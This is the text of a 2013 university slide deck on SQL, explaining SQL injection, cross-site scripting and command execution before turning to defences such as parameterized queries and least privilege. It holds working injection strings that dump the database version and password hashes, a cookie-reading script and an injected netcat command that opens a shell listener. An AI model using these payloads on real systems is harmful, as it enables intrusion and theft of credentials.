Download presentation
Presentation is loading. Please wait.
1
Nick Tsamis University of Tulsa CS 7493 April 2013
2
What is SQL? Why SQL Matters. *yawn* What’s the big deal? What could possibly go wrong? SQL Injection XSS Command Execution *pffft* So we shouldn’t use SQL? That’s some smart SQL!
3
Structured Query Language L anguage Specialized programming language Utilized in relational databases Q uery Raw data is queried to obtain information “Our business is turning data into information.” – Michael A. Peterson S tructured Adheres to a strict, defined format Query Table Column
4
Relational Databases vs Hierarchical Databases Data relations are stored Top down flow only
5
Popularity One of the first commercial languages for relational models Today, exists as the de facto standard (ANSI and ISO) It’s EVERYWHERE Versatility It’s flexible: T-SQL MySQL LINQ
6
Vulnerabilities SQL is powerful…if you grant it Manages data some of which is sensitive Provides a great entry point for access Recovering lost password: Security is not always implicit Raw SQL can be very vulnerable to simple injections if $EMAIL = “anything' OR 'x'='x”
7
SQL Injection Injecting unintended code into a query Returning user name from ID Source code The attack We add a second condition that will always examine true (1=1) Purpose is to dump all user information $id = ‘ or 1=1 # WHERE user_id = ‘ ’ or 1=1 # ’ ”;
8
SQL Injection Injecting unintended code into a query Returning sql information The attack(s) We add a union select to dump additional data $id = ‘ union SELECT 1, user() # Yields current sql user $id = ‘ and 1=1 union select database(),version() # Yields current sql version and database name
9
SQL Injection Injecting unintended code into a query Case Study Returning the good stuff!! The attack(s) We add a union select to dump password data $id = ‘ union select user, password FROM users # Yields current user and associated password (hash)
10
XSS (Cross Site Scripting) Execute unintended scripts inline Throw an alert Passed as a url argument What if we put an inline script in that url? Alert box shown:
11
XSS (Cross Site Scripting) Well that wasn’t exactly l33t… Have a cookie alert(document.cookie) Alert box shown: More serious implications: Run a custom script that can open a remote connection (backdoor) Read and dump configuration data (SQL or OS)
12
Command Execution Use the secret entrance A site that allows for free IP Pinging Sample source: Concatenating commands might work… 192.168.200.128;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 8999 > /tmp/pipe Attempts to allow connections on port 8999 with netcat (nc) Upon execution, browser waits for connection on port 8999
13
Better SQL Stored Procedures Preformat and secure a static query Grant access to a SP, not the tables it accesses Typically increased performance Parameter check – data typing No network traffic – run inside the engine String Filtering/Escaping String escape characters ‘ “ \ NUL
14
Mo’ Better SQL Parameterized SQL Strongly typed data is bound on execution Parameters are populated and checked User input is not directly embedded Database Management Permission limitation Principle of Least Privilege
16
http://upload.wikimedia.org/wikipedia/commons/thumb /e/eb/Hierarchical_Model.svg/320px- Hierarchical_Model.svg.png http://upload.wikimedia.org/wikipedia/commons/thumb /e/eb/Hierarchical_Model.svg/320px- Hierarchical_Model.svg.png http://www.ibm.com/developerworks/library/x- matters8/relat.gif http://www.ibm.com/developerworks/library/x- matters8/relat.gif http://upload.wikimedia.org/wikipedia/commons/a/aa/S QL_ANATOMY_wiki.svg http://upload.wikimedia.org/wikipedia/commons/a/aa/S QL_ANATOMY_wiki.svg http://www.unixwiz.net/techtips/sql-injection.html http://www.unixwiz.net/techtips/sql-injection.html http://wikipedia.org http://wikipedia.org http://www.codinghorror.com/blog/2005/04/give-me- parameterized-sql-or-give-me-death.html http://www.codinghorror.com/blog/2005/04/give-me- parameterized-sql-or-give-me-death.html
Similar presentations
